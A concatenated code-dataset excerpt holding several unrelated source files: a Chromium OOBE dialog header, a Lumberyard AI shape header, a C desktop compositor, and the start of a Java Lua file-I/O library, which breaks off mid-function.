* @brief
* @author Bwar
* @date: 2016年8月17日
* @note
* Modify history:
******************************************************************************/
#include "Operator.hpp"
namespace neb
{

// Default constructor: Operator (declared in Operator.hpp) has nothing to
// initialize here.
Operator::Operator()
{
}

// Destructor: nothing to release.
Operator::~Operator()
{
}

} /* namespace neb */
| 132 |
575 | <reponame>iridium-browser/iridium-browser<gh_stars>100-1000
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
#define CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
#include <string>
#include "ash/public/cpp/login_accelerators.h"
#include "ash/public/cpp/login_types.h"
#include "ash/public/cpp/system_tray_observer.h"
#include "base/macros.h"
#include "base/memory/weak_ptr.h"
#include "base/scoped_observation.h"
#include "chrome/browser/ash/login/screens/error_screen.h"
#include "chrome/browser/ui/ash/keyboard/chrome_keyboard_controller_client.h"
#include "chrome/browser/ui/ash/login_screen_client.h"
#include "chrome/browser/ui/chrome_web_modal_dialog_manager_delegate.h"
#include "chrome/browser/ui/webui/chromeos/login/oobe_ui.h"
#include "components/web_modal/web_contents_modal_dialog_host.h"
#include "ui/views/view.h"
#include "ui/views/view_observer.h"
#include "ui/web_dialogs/web_dialog_delegate.h"
namespace content {
class WebContents;
}
namespace ui {
class Accelerator;
}
namespace views {
class WebDialogView;
class Widget;
} // namespace views
namespace chromeos {
class CaptivePortalDialogDelegate;
class LayoutWidgetDelegateView;
class LoginDisplayHostMojo;
class OobeWebDialogView;
// This class manages the behavior of the Oobe UI dialog.
// And its lifecycle is managed by the widget created in Show().
// WebDialogView<----delegate_----OobeUIDialogDelegate
// |
// |
// V
// clientView---->Widget's view hierarchy
class OobeUIDialogDelegate : public ui::WebDialogDelegate,
                             public ChromeKeyboardControllerClient::Observer,
                             public CaptivePortalWindowProxy::Observer,
                             public OobeUI::Observer,
                             public views::ViewObserver,
                             public ash::SystemTrayObserver {
 public:
  explicit OobeUIDialogDelegate(base::WeakPtr<LoginDisplayHostMojo> controller);
  ~OobeUIDialogDelegate() override;

  // Show the dialog widget.
  void Show();

  // Show the dialog widget stretched to full screen.
  void ShowFullScreen();

  // Close the widget, and it will delete this object.
  void Close();

  // Hide the dialog widget, but do not shut it down.
  void Hide();

  // Returns whether the dialog is currently visible.
  bool IsVisible();

  // Update the oobe state of the dialog.
  void SetState(ash::OobeDialogState state);

  // Tell the dialog whether to call FixCaptivePortal next time it is shown.
  void SetShouldDisplayCaptivePortal(bool should_display);

  // Accessors for the hosted web contents / OOBE UI / native window / view.
  content::WebContents* GetWebContents();
  OobeUI* GetOobeUI() const;
  gfx::NativeWindow GetNativeWindow() const;
  views::View* GetWebDialogView();

  // Test-only access to the captive portal dialog delegate.
  CaptivePortalDialogDelegate* captive_portal_delegate_for_test() {
    return captive_portal_delegate_.get();
  }

 private:
  // ui::WebDialogDelegate:
  ui::ModalType GetDialogModalType() const override;
  std::u16string GetDialogTitle() const override;
  GURL GetDialogContentURL() const override;
  void GetWebUIMessageHandlers(
      std::vector<content::WebUIMessageHandler*>* handlers) const override;
  void GetDialogSize(gfx::Size* size) const override;
  std::string GetDialogArgs() const override;
  // NOTE: This function starts cleanup sequence that would call FinishCleanup
  // and delete this object in the end.
  void OnDialogClosed(const std::string& json_retval) override;
  void OnCloseContents(content::WebContents* source,
                       bool* out_close_dialog) override;
  bool ShouldShowDialogTitle() const override;
  bool HandleContextMenu(content::RenderFrameHost* render_frame_host,
                         const content::ContextMenuParams& params) override;
  std::vector<ui::Accelerator> GetAccelerators() override;
  bool AcceleratorPressed(const ui::Accelerator& accelerator) override;

  // views::ViewObserver:
  void OnViewBoundsChanged(views::View* observed_view) override;
  void OnViewIsDeleting(views::View* observed_view) override;

  // ChromeKeyboardControllerClient::Observer:
  void OnKeyboardVisibilityChanged(bool visible) override;

  // CaptivePortalWindowProxy::Observer:
  void OnBeforeCaptivePortalShown() override;
  void OnAfterCaptivePortalHidden() override;

  // OobeUI::Observer:
  void OnCurrentScreenChanged(OobeScreenId current_screen,
                              OobeScreenId new_screen) override;
  void OnDestroyingOobeUI() override;

  // ash::SystemTrayObserver:
  void OnFocusLeavingSystemTray(bool reverse) override;

  base::WeakPtr<LoginDisplayHostMojo> controller_;
  base::WeakPtr<CaptivePortalDialogDelegate> captive_portal_delegate_;

  // Root widget. It is assumed that widget is placed as a full-screen inside
  // LockContainer.
  views::Widget* widget_ = nullptr;
  // Reference to view owned by widget_.
  LayoutWidgetDelegateView* layout_view_ = nullptr;
  // Reference to dialog view stored in widget_.
  OobeWebDialogView* dialog_view_ = nullptr;

  // Scoped observations tying this object's observer registrations to its
  // lifetime.
  base::ScopedObservation<views::View, views::ViewObserver> view_observer_{
      this};
  base::ScopedObservation<ChromeKeyboardControllerClient,
                          ChromeKeyboardControllerClient::Observer>
      keyboard_observer_{this};
  base::ScopedObservation<CaptivePortalWindowProxy,
                          CaptivePortalWindowProxy::Observer>
      captive_portal_observer_{this};
  base::ScopedObservation<OobeUI, OobeUI::Observer> oobe_ui_observer_{this};
  std::unique_ptr<
      base::ScopedObservation<LoginScreenClient,
                              ash::SystemTrayObserver,
                              &LoginScreenClient::AddSystemTrayObserver,
                              &LoginScreenClient::RemoveSystemTrayObserver>>
      scoped_system_tray_observer_;

  // Maps keyboard accelerators to login screen actions.
  std::map<ui::Accelerator, ash::LoginAcceleratorAction> accel_map_;
  ash::OobeDialogState state_ = ash::OobeDialogState::HIDDEN;

  // Whether the captive portal screen should be shown the next time the Gaia
  // dialog is opened.
  bool should_display_captive_portal_ = false;

  DISALLOW_COPY_AND_ASSIGN(OobeUIDialogDelegate);
};
#endif // CHROME_BROWSER_ASH_LOGIN_UI_OOBE_UI_DIALOG_DELEGATE_H_
| 2,293 |
1,738 | <reponame>jeikabu/lumberyard<gh_stars>1000+
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
// Original file Copyright Crytek GMBH or its affiliates, used under license.
// Description : Temp file holding code extracted from CAISystem.h/cpp
#ifndef CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
#define CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
#pragma once
// Rasterized occupancy mask for a 2D shape: a grid of cells over the shape's
// bounding box, each cell classified as inside, on the edge of, or outside
// the shape. Used to answer point-in-shape queries quickly.
class CShapeMask
{
public:
    CShapeMask();
    ~CShapeMask();

    /// Builds this mask according to pShape down to the granularity
    void Build(const struct SShape* pShape, float granularity);

    /// categorisation of a point according to this mask
    enum EType
    {
        TYPE_IN, TYPE_EDGE, TYPE_OUT
    };
    /// Classifies pt against the mask grid.
    EType GetType(const Vec3 pt) const;

    /// Approximate memory footprint in bytes.
    size_t MemStats() const;

private:
    /// used just during building: classifies an axis-aligned cell against pShape
    EType GetType(const struct SShape* pShape, const Vec3& min, const Vec3& max) const;
    /// gets the min/max values of the 2D box indicated by i and j
    void GetBox(Vec3& min, Vec3& max, int i, int j);

    AABB m_aabb;                 // bounding box covered by the grid
    unsigned m_nx, m_ny;         // grid dimensions (cells per axis)
    float m_dx, m_dy;            // original comment said "number of pixels" — presumably the per-cell extents; verify
    // container bit-pair is indexed by x + y * m_bytesPerRow
    unsigned m_bytesPerRow;
    typedef std::vector<unsigned char> TContainer;
    TContainer m_container;
};
/// A named 2D/prism shape used by the AI system (paths, territories,
/// perception modifiers). The polygon lives in 'shape'; the occupied volume
/// is [aabb.min.z, aabb.min.z + height] over the 2D footprint.
struct SShape
{
    SShape();
    explicit SShape(
        const ListPositions& shape_
        , const AABB& aabb_
        , IAISystem::ENavigationType navType = IAISystem::NAV_UNSET
        , int type = 0
        , bool closed_ = false
        , float height_ = 0.0f
        , EAILightLevel lightLevel_ = AILL_NONE
        , bool temp = false
    );
    explicit SShape(
        const ListPositions& shape_
        , bool allowMask = false
        , IAISystem::ENavigationType navType_ = IAISystem::NAV_UNSET
        , int type_ = 0
        , bool closed_ = false
        , float height_ = 0.0f
        , EAILightLevel lightLevel_ = AILL_NONE
        , bool temp = false);
    ~SShape();
    void RecalcAABB();
    /// Builds a mask with a specified granularity
    void BuildMask(float granularity);
    void ReleaseMask();
    // offsets this shape(called when segmented world shifts)
    void OffsetShape(const Vec3& offset);
    ListPositions::const_iterator NearestPointOnPath(const Vec3& pos, bool forceLoop, float& dist, Vec3& nearestPt, float* distAlongPath = 0,
        Vec3* segmentDir = 0, uint32* segmentStartIndex = 0, float* pathLength = 0, float* segmentFraction = 0) const;
    // Populate an array with intersection distances
    // Can combine with IsPointInsideShape to establish entry/exit where appropriate
    // If testHeight is true, will take the height of sides into account
    // If testTopBottom is true, will test for intersection on top and bottom sides of a closed shape
    int GetIntersectionDistances(const Vec3& start, const Vec3& end, float intersectDistArray[], int maxIntersections, bool testHeight = false, bool testTopBottom = false) const;
    Vec3 GetPointAlongPath(float dist) const;
    bool IsPointInsideShape(const Vec3& pos, bool checkHeight) const;
    bool ConstrainPointInsideShape(Vec3& pos, bool checkHeight) const;
    size_t MemStats() const;
    ListPositions shape; /// Points describing the shape.
    AABB aabb; /// Bounding box of the shape points.
    IAISystem::ENavigationType navType; /// Navigation type associated with AIPaths
    int type; /// AIobject/anchor type associated with an AIshape
    float height; /// Height of the shape. The shape volume is described as [aabb.minz, aabb.minz+height]
    float devalueTime; /// Timeout for occupied AIpaths
    bool temporary; /// Flag indicating if the path is temporary and should be deleted upon reset.
    bool enabled; /// Flag indicating if the shape is enabled. Disabled shapes are excluded from queries.
    EAILightLevel lightLevel; /// The light level modifier of the shape.
    bool closed; /// Flag indicating if the shape is a closed volume
    /// Owning deep-copy smart pointer for an optional CShapeMask.
    /// Copying a ShapeMaskPtr clones the mask; destruction deletes it.
    class ShapeMaskPtr
    {
    public:
        ShapeMaskPtr(CShapeMask* ptr = 0)
            : m_p(ptr) {}
        ShapeMaskPtr(const ShapeMaskPtr& other)
            : m_p(0)
        {
            if (other.m_p)
            {
                m_p = new CShapeMask;
                * m_p = *other.m_p;
            }
        }
        // Deep-copying assignment. Previously the compiler-generated shallow
        // assignment was used, which made two ShapeMaskPtrs own the same
        // CShapeMask and caused a double delete in ~ShapeMaskPtr (and leaked
        // the left-hand side's old mask). Mirrors the copy constructor.
        ShapeMaskPtr& operator=(const ShapeMaskPtr& other)
        {
            if (this != &other)
            {
                SAFE_DELETE(m_p);
                if (other.m_p)
                {
                    m_p = new CShapeMask;
                    *m_p = *other.m_p;
                }
            }
            return *this;
        }
        ~ShapeMaskPtr() { SAFE_DELETE(m_p); }
        CShapeMask* operator->() {return m_p; }
        const CShapeMask* operator->() const {return m_p; }
        CShapeMask& operator*() {return *m_p; }
        const CShapeMask& operator*() const {return *m_p; }
        operator CShapeMask*() {
            return m_p;
        }
        CShapeMask* Get() {return m_p; }
        const CShapeMask* Get() const {return m_p; }
    private:
        CShapeMask* m_p; // owned; may be null when no mask has been built
    };
    ShapeMaskPtr shapeMask; /// Optional mask for this shape that speeds up 2D in/out/edge tests
};
typedef std::map<string, SShape> ShapeMap;
/// An SShape that attenuates AI perception inside its volume: perception is
/// reduced linearly with distance (fReductionPerMetre), clamped at fReductionMax.
struct SPerceptionModifierShape
    : SShape
{
    SPerceptionModifierShape(const ListPositions& shape, float reductionPerMetre, float reductionMax, float fHeight, bool isClosed);
    float fReductionPerMetre; // perception reduction applied per metre of penetration
    float fReductionMax;      // upper bound on the total reduction
};
typedef std::map<string, SPerceptionModifierShape> PerceptionModifierShapeMap;
#endif // CRYINCLUDE_CRYAISYSTEM_SHAPE2_H
| 2,301 |
453 | <filename>programs/awm/composite.c
#include <unistd.h>
#include <stdint.h>
#include <stdlibadd/assert.h>
#include <stdlibadd/array.h>
#include <agx/lib/shapes.h>
#include "window.h"
#include "awm_internal.h"
#include "composite.h"
// Dirty screen rects queued for the next composite pass. Created in
// compositor_init(); filled by compositor_queue_rect_to_redraw(); drained
// (and each Rect* freed) by compositor_render_frame().
array_t* _g_screen_rects_to_update_this_cycle = NULL;
/* Queue a composite for the provided rect over the entire desktop
While compositing the frame, awm will determine what individual elements
must be redrawn to composite the provided rectangle.
These may include portions of windows, the desktop background, etc.
*/
void compositor_queue_rect_to_redraw(Rect update_rect) {
    // Degenerate rects contribute no pixels; skip them.
    if (update_rect.size.width == 0 || update_rect.size.height == 0) {
        // TODO(PT): Investigate how this happens? Trigger by quickly resizing a window to flood events
        //printf("Dropping update rect of zero height or width\n");
        return;
    }
    // Drop updates once the per-cycle queue is full rather than overflowing it.
    if (_g_screen_rects_to_update_this_cycle->size + 1 >= _g_screen_rects_to_update_this_cycle->max_size) {
        //printf("Dropping update rect because we've hit our max updates this cycle: (%d, %d), (%d, %d)\n", rect_min_x(update_rect), rect_min_y(update_rect), update_rect.size.width, update_rect.size.height);
        return;
    }
    // The queue owns a heap copy of the rect; compositor_render_frame() frees it.
    Rect* r = calloc(1, sizeof(Rect));
    if (!r) {
        // Allocation failure: drop this update instead of dereferencing NULL.
        // The region will be repainted when a later rect covering it is queued.
        return;
    }
    r->origin.x = update_rect.origin.x;
    r->origin.y = update_rect.origin.y;
    r->size.width = update_rect.size.width;
    r->size.height = update_rect.size.height;
    array_insert(_g_screen_rects_to_update_this_cycle, r);
}
/* Queue composites for the area of the bg rectangle that's not obscured by the fg rectangle
*/
void compositor_queue_rect_difference_to_redraw(Rect bg, Rect fg) {
    // rect_diff() returns heap-allocated rects covering bg minus fg;
    // we own both the array and its elements.
    array_t* uncovered = rect_diff(bg, fg);
    int32_t idx = uncovered->size;
    // Walk from the last element down, matching the order rects were
    // previously queued in.
    while (idx-- > 0) {
        Rect* piece = array_lookup(uncovered, idx);
        compositor_queue_rect_to_redraw(*piece);
        free(piece);
    }
    array_destroy(uncovered);
}
// One-time setup: allocate the per-cycle dirty-rect queue (capacity 256,
// matching the overflow check in compositor_queue_rect_to_redraw).
void compositor_init(void) {
    _g_screen_rects_to_update_this_cycle = array_create(256);
}
// Composite one frame:
//  1. For each queued dirty rect, split it into window-covered parts (queued
//     as per-view "extra draws") and uncovered parts (painted from the
//     desktop background into the back buffer).
//  2. Draw ready views, extra draws, and the cursor into the back buffer.
//  3. Blit only the touched regions to the physical framebuffer.
// Frees every queued Rect* and empties the queue as a side effect.
void compositor_render_frame(void) {
    ca_layer* desktop_background = desktop_background_layer();
    array_t* all_views = all_desktop_views();
    ca_layer* video_memory = video_memory_layer();            // back buffer
    ca_layer* physical_video_memory = physical_video_memory_layer(); // mmapped framebuffer
    // Fetch remote layers for windows that have asked for a redraw
    windows_fetch_queued_windows();
    // Process rects that have been dirtied while processing other events
    for (int32_t i = 0; i < _g_screen_rects_to_update_this_cycle->size; i++) {
        Rect* rp = array_lookup(_g_screen_rects_to_update_this_cycle, i);
        Rect r = *rp;
        // Tracks the portion of r not yet claimed by any opaque view.
        array_t* unobscured_region = array_create(256);
        rect_add(unobscured_region, r);
        // Handle the parts of the dirty region that are obscured by desktop views
        for (int32_t j = 0; j < all_views->size; j++) {
            view_t* view = array_lookup(all_views, j);
            // We can't occlude using a view if the view uses transparency
            if (view->layer->alpha < 1.0) {
                continue;
            }
            if (!rect_intersects(view->frame, r)) {
                continue;
            }
            for (int32_t k = 0; k < view->drawable_rects->size; k++) {
                Rect* visible_region_ptr = array_lookup(view->drawable_rects, k);
                Rect visible_region = *visible_region_ptr;
                if (rect_intersects(visible_region, r)) {
                    if (rect_contains_rect(visible_region, r)) {
                        // The entire rect should be redrawn from this window
                        rect_add(view->extra_draws_this_cycle, r);
                        // And subtract the area of the rect from the region to update
                        unobscured_region = update_occlusions(unobscured_region, r);
                        break;
                    }
                    else {
                        // This view needs to redraw the intersection of its visible rect and the update rect
                        Rect intersection = rect_intersect(visible_region, r);
                        rect_add(view->extra_draws_this_cycle, intersection);
                        unobscured_region = update_occlusions(unobscured_region, intersection);
                    }
                    // If all the area of the region to update has been handled,
                    // stop iterating windows early
                    if (!unobscured_region->size) {
                        break;
                    }
                }
            }
        }
        // Blit the regions that are not covered by windows with the desktop background layer
        // (iterate backwards because entries are removed while iterating).
        for (int32_t j = unobscured_region->size - 1; j >= 0; j--) {
            Rect* bg_rect = array_lookup(unobscured_region, j);
            blit_layer(
                video_memory,
                desktop_background,
                *bg_rect,
                *bg_rect
            );
            array_remove(unobscured_region, j);
            free(bg_rect);
        }
        array_destroy(unobscured_region);
    }
    array_t* desktop_views_to_composite = desktop_views_ready_to_composite_array();
    draw_views_to_layer(desktop_views_to_composite, video_memory);
    draw_queued_extra_draws(all_views, video_memory);
    // Cursor is drawn last so it sits above everything; remember its rect
    // so it can be pushed to the framebuffer below.
    Rect mouse_rect = _draw_cursor(video_memory);
    // Blit everything we drew above to the memory-mapped framebuffer
    // (backwards: each queued rect is removed and freed as it is consumed).
    for (int32_t i = _g_screen_rects_to_update_this_cycle->size - 1; i >= 0; i--) {
        Rect* r = array_lookup(_g_screen_rects_to_update_this_cycle, i);
        blit_layer(
            physical_video_memory,
            video_memory,
            *r,
            *r
        );
        array_remove(_g_screen_rects_to_update_this_cycle, i);
        free(r);
    }
    complete_queued_extra_draws(all_views, video_memory, physical_video_memory);
    // Push the visible regions of every freshly composited view.
    for (int32_t i = 0; i < desktop_views_to_composite->size; i++) {
        view_t* view = array_lookup(desktop_views_to_composite, i);
        for (int32_t j = 0; j < view->drawable_rects->size; j++) {
            Rect* r_ptr = array_lookup(view->drawable_rects, j);
            Rect r = *r_ptr;
            blit_layer(physical_video_memory, video_memory, r, r);
        }
    }
    blit_layer(physical_video_memory, video_memory, mouse_rect, mouse_rect);
    desktop_views_flush_queues();
    array_destroy(all_views);
}
| 2,140 |
335 | {
"word": "Dreadnought",
"definitions": [
"A type of battleship introduced in the early 20th century, larger and faster than its predecessors and equipped entirely with large-calibre guns.",
"A fearless person.",
"A heavy overcoat for stormy weather."
],
"parts-of-speech": "Noun"
} | 115 |
1,968 | <reponame>agramonte/corona
// Copyright (c) 2008 Groundspeak, Inc.
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation
// files (the "Software"), to deal in the Software without
// restriction, including without limitation the rights to use,
// copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following
// conditions:
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
// OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
// HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
// WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
// OTHER DEALINGS IN THE SOFTWARE.
//
package com.groundspeak.mochalua;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Enumeration;
import java.util.Vector;
import javax.microedition.io.Connector;
import javax.microedition.io.file.FileConnection;
import javax.microedition.io.file.FileSystemRegistry;
/**
*
* @author p.pavelko
*/
class LuaIOLib {
// Slots in the library environment table holding the default input/output
// files (see getiofile()/g_iofile()).
public final static int IO_INPUT = 1;
public final static int IO_OUTPUT = 2;
// fseek() origins, mirroring C stdio's SEEK_SET/SEEK_CUR/SEEK_END.
public final static int SEEK_CUR = 1;
public final static int SEEK_END = 2;
public final static int SEEK_SET = 0;
// setvbuf() buffering modes: full, line, none (values mirror C stdio).
public final static int _IOFBF = 0x0000;
public final static int _IOLBF = 0x0040;
public final static int _IONBF = 0x0004;
//public final static int LIMIT = 10;
// Names used in getiofile()'s error message, indexed by (IO_INPUT/IO_OUTPUT - 1).
public final static String[] fnames = { "input", "output" };
/**
 * Emulates a C stdio FILE on top of a JSR-75 FileConnection.
 *
 * Read-only ("r") streams read directly from {@code inputStream} (which is
 * mark()ed so fseek can reset/skip). Every other mode mirrors the whole file
 * into {@code buffer} in memory; writes go to the buffer and fflush() rewrites
 * the entire file from it. {@code bufferPosition} is the current file offset
 * in both schemes. Return conventions follow C stdio: -1 / null on failure.
 */
static class FileStruct {
    // fopen() access modes, corresponding to "r", "w", "a", "r+", "w+", "a+".
    public static final int ACCESS_MODE_READ = 0;
    public static final int ACCESS_MODE_WRITE = 1;
    public static final int ACCESS_MODE_APPEND = 2;
    public static final int ACCESS_MODE_READ_PLUS = 3;
    public static final int ACCESS_MODE_WRITE_PLUS = 4;
    public static final int ACCESS_MODE_APPEND_PLUS = 5;
    // Direction of the last I/O op. On "+" streams a read may not directly
    // follow a write (or vice versa): fread/fwrite return -1 in that case,
    // and fflush()/fseek() reset the state to OP_NONE.
    private static final int OP_NONE = 0;
    private static final int OP_READ = 1;
    private static final int OP_WRITE = 2;
    public StringBuffer buffer = null;        // in-memory mirror of the file (non-"r" modes)
    public int bufferPosition = 0;            // current offset within the file/buffer
    public FileConnection connection = null;  // underlying JSR-75 connection
    public InputStream inputStream = null;    // open stream for "r" (and initial load)
    public OutputStream outputStream = null;  // opened fresh by each fflush()
    public boolean binaryMode = false;        // "b" flag was present; not otherwise consulted here
    public int accessMode = ACCESS_MODE_READ;
    public boolean isTmpFile = false;         // created by tmpfile(); deleted on fclose()
    public int bufferingType = _IOFBF;        // setvbuf() mode
    public int bufferSize = LuaAPI.LUAL_BUFFERSIZE; // flush threshold for _IOFBF/_IOLBF
    public int bufferCounter = 0;             // chars written since the last threshold flush
    public boolean isClosed = false;
    private boolean isFlushed = true;         // false while buffer has unwritten changes
    private int lastOp = OP_NONE;
    public boolean bothRWMode = false;        // "+" flag was present
    /**
     * Reads size*count chars, appending them to buf. Returns the number of
     * chars read, or -1 on failure/EOF (note: unlike C fread, a short read
     * at EOF returns -1 even if some chars were already appended to buf).
     */
    public int fread ( StringBuffer buf, int size, int count ) {
        if ( bothRWMode && lastOp == OP_WRITE ) {
            return -1;
        }
        try {
            switch ( accessMode ) {
                case ACCESS_MODE_WRITE:
                case ACCESS_MODE_APPEND: {
                    // Write-only stream: reads are not permitted.
                    return -1;
                }
                case ACCESS_MODE_READ: {
                    // "r": stream directly from the connection.
                    if ( inputStream == null )
                        inputStream = connection.openInputStream ();
                    if ( inputStream == null )
                        return -1;
                    int k = 0;
                    int i = 0;
                    lastOp = OP_READ;
                    for (; i < count * size; i ++ ) {
                        k = inputStream.read ();
                        if ( k == -1 )
                            return -1;
                        buf.append ( ( char ) k );
                        bufferPosition ++;
                    }
                    return i;
                }
                case ACCESS_MODE_READ_PLUS:
                case ACCESS_MODE_WRITE_PLUS:
                case ACCESS_MODE_APPEND_PLUS: {
                    // Buffered modes: read from the in-memory mirror.
                    int i = 0;
                    lastOp = OP_READ;
                    for (; i < count * size; i ++ ) {
                        if ( bufferPosition >= buffer.length () )
                            return -1;
                        buf.append ( buffer.charAt ( bufferPosition ++ ) );
                    }
                    return i;
                }
            }
        }
        catch ( Exception ex ) {
            return -1;
        }
        return -1;
    }
    /**
     * Writes size*count chars of buf into the in-memory mirror (overwriting
     * at bufferPosition, or always appending in the append modes), then
     * flushes according to the setvbuf() mode. Returns chars written or -1.
     */
    public int fwrite ( String buf, int size, int count ) {
        if ( bothRWMode && lastOp == OP_READ ) {
            return -1;
        }
        switch ( accessMode ) {
            case ACCESS_MODE_READ: {
                // Read-only stream: writes are not permitted.
                return -1;
            }
            case ACCESS_MODE_READ_PLUS:
            case ACCESS_MODE_WRITE:
            case ACCESS_MODE_WRITE_PLUS: {
                int i = 0;
                lastOp = OP_WRITE;
                isFlushed = false;
                for (; i < count * size; i ++ ) {
                    bufferCounter ++;
                    if ( bufferPosition >= buffer.length () ) {
                        // Past the end: grow the mirror.
                        buffer.append ( buf.charAt ( i ) );
                        bufferPosition ++;
                    }
                    else {
                        // Inside the file: overwrite in place.
                        buffer.setCharAt ( bufferPosition ++, buf.charAt ( i ) );
                    }
                }
                // Honor the buffering policy (full / line / none).
                switch ( bufferingType ) {
                    case _IOFBF:
                    {
                        if ( bufferCounter > bufferSize ) {
                            try {
                                fflush ();
                                bufferCounter = 0;
                            }
                            catch ( Exception ex ) {
                                return -1;
                            }
                        }
                    }
                    break;
                    case _IOLBF:
                    {
                        // Flush on newline or when the threshold is exceeded.
                        if ( buf.toString ().indexOf ( "\n" ) != -1 || bufferCounter > bufferSize ) {
                            try {
                                fflush ();
                                if ( bufferCounter > bufferSize )
                                    bufferCounter = 0;
                            }
                            catch ( Exception ex ) {
                                return -1;
                            }
                        }
                    }
                    break;
                    case _IONBF:
                    {
                        // Unbuffered: flush after every write.
                        try {
                            fflush ();
                        }
                        catch ( Exception ex ) {
                            return -1;
                        }
                    }
                    break;
                }
                return i;
            }
            case ACCESS_MODE_APPEND:
            case ACCESS_MODE_APPEND_PLUS: {
                // Append modes always write at the end, regardless of position.
                int i = 0;
                isFlushed = false;
                lastOp = OP_WRITE;
                for (; i < count * size; i ++ ) {
                    bufferCounter ++;
                    buffer.append ( buf.charAt ( i ) );
                }
                bufferPosition = buffer.length ();
                switch ( bufferingType ) {
                    case _IOFBF:
                    {
                        if ( bufferCounter > bufferSize ) {
                            try {
                                fflush ();
                                bufferCounter = 0;
                            }
                            catch ( Exception ex ) {
                                return -1;
                            }
                        }
                    }
                    break;
                    case _IOLBF:
                    {
                        if ( buf.toString ().indexOf ( "\n" ) != -1 || bufferCounter > bufferSize ) {
                            try {
                                fflush ();
                                if ( bufferCounter > bufferSize )
                                    bufferCounter = 0;
                            }
                            catch ( Exception ex ) {
                                return -1;
                            }
                        }
                    }
                    break;
                    case _IONBF:
                    {
                        try {
                            fflush ();
                        }
                        catch ( Exception ex ) {
                            return -1;
                        }
                    }
                    break;
                }
                return i;
            }
        }
        return -1;
    }
    /**
     * Skips leading whitespace, then accumulates characters up to the next
     * whitespace/EOF and parses them with Double.valueOf (throws on a
     * malformed number). Used by the "*n" read format.
     */
    public double readNumber () throws Exception {
        if ( bothRWMode && lastOp == OP_WRITE ) {
            return -1;
        }
        switch ( accessMode ) {
            case ACCESS_MODE_WRITE:
            case ACCESS_MODE_APPEND: {
                return -1;
            }
            case ACCESS_MODE_READ: {
                if ( inputStream == null )
                    inputStream = connection.openInputStream ();
                if ( inputStream == null )
                    throw new Exception ();
                int k = 0;
                lastOp = OP_READ;
                StringBuffer sb = new StringBuffer ();
                boolean isNonWSCharOccurred = false;
                for (;;) {
                    k = inputStream.read ();
                    bufferPosition ++;
                    switch ( k ) {
                        case ' ':
                        case '\n':
                        case '\t': {
                            if ( isNonWSCharOccurred == false ) {
                                // Still skipping leading whitespace.
                                continue;
                            }
                            // Trailing delimiter: push it back by re-seeking.
                            bufferPosition --;
                            inputStream.reset ();
                            inputStream.skip ( bufferPosition );
                            Double res = new Double ( ( ( Double ) Double.valueOf ( sb.toString () ) ).doubleValue () );
                            if ( res != null ) {
                                return res.doubleValue ();
                            }
                            else {
                                throw new Exception ( "readNumber: String is not number" );
                            }
                        }
                        case -1: {
                            Double res = new Double ( ( ( Double ) Double.valueOf ( sb.toString () ) ).doubleValue () );
                            if ( res != null ) {
                                return res.doubleValue ();
                            }
                            else {
                                throw new Exception ( "readNumber: String is not number" );
                            }
                        }
                        default:
                            sb.append ( ( char ) k );
                            isNonWSCharOccurred = true;
                            break;
                    }
                }
            }
            case ACCESS_MODE_READ_PLUS:
            case ACCESS_MODE_WRITE_PLUS:
            case ACCESS_MODE_APPEND_PLUS: {
                lastOp = OP_READ;
                StringBuffer buf = new StringBuffer ();
                int k = 0;
                boolean isNonWSCharOccurred = false;
                for (;;) {
                    // NOTE(review): charAt() never yields -1, so in this
                    // branch EOF surfaces as an IndexOutOfBoundsException
                    // propagated to the caller — confirm intended.
                    k = buffer.charAt ( bufferPosition ++ );
                    switch ( k ) {
                        case ' ':
                        case '\n':
                        case '\t': {
                            if ( isNonWSCharOccurred == false ) {
                                continue;
                            }
                            bufferPosition --;
                            Double res = new Double ( ( ( Double ) Double.valueOf ( buf.toString () ) ).doubleValue () );
                            if ( res != null ) {
                                return res.doubleValue ();
                            }
                            else {
                                throw new Exception ( "readNumber: String is not number" );
                            }
                        }
                        case -1: {
                            Double res = new Double ( ( ( Double ) Double.valueOf ( buf.toString () ) ).doubleValue () );
                            if ( res != null ) {
                                return res.doubleValue ();
                            }
                            else {
                                throw new Exception ( "readNumber: String is not number" );
                            }
                        }
                        default:
                            buf.append ( ( char ) k );
                            isNonWSCharOccurred = true;
                            break;
                    }
                }
            }
        }
        return -1;
    }
    /**
     * Appends up to num chars (stopping after a '\n') to str, like C fgets.
     * Returns str, or null at EOF. NOTE(review): in "r" mode, hitting EOF
     * mid-line returns null even though the partial line was already
     * appended to str — callers (read_line) rely on str for the data.
     */
    public StringBuffer fgets ( StringBuffer str, int num ) {
        if ( bothRWMode && lastOp == OP_WRITE ) {
            return null;
        }
        try {
            switch ( accessMode ) {
                case ACCESS_MODE_WRITE:
                case ACCESS_MODE_APPEND: {
                    return null;
                }
                case ACCESS_MODE_READ: {
                    lastOp = OP_READ;
                    if ( inputStream == null )
                        inputStream = connection.openInputStream ();
                    if ( inputStream == null )
                        return null;
                    int k = 0;
                    for ( int i = 0; i < num; i ++ ) {
                        k = inputStream.read ();
